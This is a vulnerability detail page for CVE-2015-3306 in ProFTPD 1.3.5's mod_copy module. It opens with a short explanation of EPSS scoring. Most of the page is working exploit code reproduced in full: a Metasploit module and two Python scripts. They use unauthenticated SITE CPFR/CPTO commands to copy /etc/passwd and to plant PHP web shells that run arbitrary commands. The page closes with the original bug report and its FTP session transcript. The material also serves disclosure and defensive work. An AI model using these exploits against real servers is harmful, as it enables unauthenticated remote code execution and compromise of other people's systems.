CVE-2015-3306 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution', 'Description' => %q{ This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible. }, 'Author' => [ 'Vadim Melihow', # Original discovery, Proof of Concept 'xistence <xistence[at]0x90.nl>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-3306' ], [ 'EDB', '36742' ] ], 'Privileged' => false, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'BadChars' => '', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic gawk bash python perl' } }, 'Targets' => [ [ 'ProFTPD 1.3.5', { } ] ], 'DisclosureDate' => 'Apr 22 2015', 'DefaultTarget' => 0)) register_options( [ OptPort.new('RPORT', [true, 'HTTP port', 80]), OptPort.new('RPORT_FTP', [true, 'FTP port', 21]), OptString.new('TARGETURI', [true, 'Base path to the website', '/']), OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']), OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']) ], self.class) end def check ftp_port = datastore['RPORT_FTP'] sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end sock.puts("SITE CPFR /etc/passwd\r\n") res = sock.get_once(-1, 10) if res && res.include?('350') Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def exploit ftp_port = datastore['RPORT_FTP'] get_arg = rand_text_alphanumeric(5+rand(3)) payload_name = rand_text_alphanumeric(5+rand(3)) + '.php' sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server") sock.puts("SITE CPFR /proc/self/cmdline\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline") end sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file") end sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file") end sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?") end sock.close print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', 'vars_get' => { get_arg => "nohup #{payload.encoded} &" } ) unless res && res.code == 200 fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload") end end end

# Title: ProFTPd 1.3.5 Remote Command Execution # Date : 20/04/2015 # Author: R-73eN # Software: ProFTPd 1.3.5 with mod_copy # Tested : Kali Linux 1.06 # CVE : 2015-3306 # Greetz to Vadim Melihow for all the hard work . import socket import sys import requests #Banner banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if(len(sys.argv) < 4): print '\n Usage : exploit.py server directory cmd' else: server = sys.argv[1] #Vulnerable Server directory = sys.argv[2] # Path accessible from web ..... cmd = sys.argv[3] #PHP payload to be executed evil = '<?php system("' + cmd + '") ?>' s.connect((server, 21)) s.recv(1024) print '[ + ] Connected to server [ + ] \n' s.send('site cpfr /etc/passwd') s.recv(1024) s.send('site cpto ' + evil) s.recv(1024) s.send('site cpfr /proc/self/fd/3') s.recv(1024) s.send('site cpto ' + directory + 'infogen.php') s.recv(1024) s.close() print '[ + ] Payload sended [ + ]\n' print '[ + ] Executing Payload [ + ]\n' r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP if (r.status_code == 200): print '[ * ] Payload Executed Succesfully [ * ]' else: print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]' print '\n http://infogen.al/'

# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) # Date: 25/05/2021 # Exploit Author: Shellbr3ak # Version: 1.3.5 # Tested on: Ubuntu 16.04.6 LTS # CVE : CVE-2015-3306 #!/usr/bin/env python3 import sys import socket import requests def exploit(client, target): client.connect((target,21)) # Connecting to the target server banner = client.recv(74) print(banner.decode()) client.send(b'site cpfr /etc/passwd\r\n') print(client.recv(1024).decode()) client.send(b'site cpto <?php phpinfo(); ?>\r\n') # phpinfo() is just a PoC. print(client.recv(1024).decode()) client.send(b'site cpfr /proc/self/fd/3\r\n') print(client.recv(1024).decode()) client.send(b'site cpto /var/www/html/test.php\r\n') print(client.recv(1024).decode()) client.close() print('Exploit Completed') def check(url): req = requests.get(url) # Requesting the written PoC php file via HTTP if req.status_code == 200: print('[+] File Written Successfully') print(f'[+] Go to : {url}') else: print('[!] Something Went Wrong') print('[!] Directory might not be writable') def main(): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) target = sys.argv[1] exploit(client, target) url = 'http://' + target + '/test.php' check(url) if __name__ == '__main__': main()

Description TJ Saunders 2015-04-07 16:35:03 UTC Vadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by *unauthenticated clients*: --------------------------------- Trying 80.150.216.115... Connected to 80.150.216.115. Escape character is '^]'. 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115] site help 214-The following SITE commands are recognized (* =>'s unimplemented) 214-CPFR <sp> pathname 214-CPTO <sp> pathname 214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path 214-SYMLINK <sp> source <sp> destination 214-RMDIR <sp> path 214-MKDIR <sp> path 214-The following SITE extensions are recognized: 214-RATIO -- show all ratios in effect 214-QUOTA 214-HELP 214-CHGRP 214-CHMOD 214 Direct comments to root@www01a site cpfr /etc/passwd 350 File or directory exists, ready for destination name site cpto /tmp/passwd.copy 250 Copy successful ----------------------------------------- He provides another, scarier example: ------------------------------ site cpfr /etc/passwd 350 File or directory exists, ready for destination name site cpto <?php phpinfo(); ?> 550 cpto: Permission denied site cpfr /proc/self/fd/3 350 File or directory exists, ready for destination name site cpto /var/www/test.php test.php now contains ---------------------- 2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument 2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): FTP session opened. 2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php phpinfo(); ?>' for copying: Permission denied ----------------------- test.php contains contain correct php script "<?php phpinfo(); ?>" which can be run by the php interpreter Source: http://bugs.proftpd.org/show_bug.cgi?id=4169